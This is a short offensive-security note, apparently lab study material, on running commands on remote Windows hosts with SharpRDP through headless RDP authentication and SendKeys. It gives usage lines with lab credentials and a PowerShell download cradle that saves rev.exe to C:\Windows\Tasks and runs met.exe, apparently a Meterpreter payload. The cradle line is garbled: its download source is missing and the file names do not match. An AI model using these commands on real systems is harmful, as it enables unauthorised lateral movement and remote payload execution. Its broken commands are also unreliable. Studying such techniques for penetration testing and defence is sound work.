headless RDP with SharpRDP

The RDP application (mstsc.exe) builds upon the terminal services library mstscax.dll. this library exposes interfaces to both scripts and compiled code through COM objects.


SharpRDP is a C# application that uses uses the non-scriptable interfaces exposed by mstscax.dll to perform authentication in the same way as mstsc.exe. Once authentication is performed, SharpRDP allows us to execute code through SendKeys. In this manner, no GUI access is required and setting up a reverse tunnel is unnecessary.

SharpRDP.exe computername=appsrv01 command=notepad username=corp1\dave password=lab

Executing a PowerShell download cradle on remote system:

sharprdp.exe computername=client2 command="powershell (New-Object
'C:\Windows\Tasks\rev.exe'); C:\Windows\Tasks\met.exe" username=client1\dave

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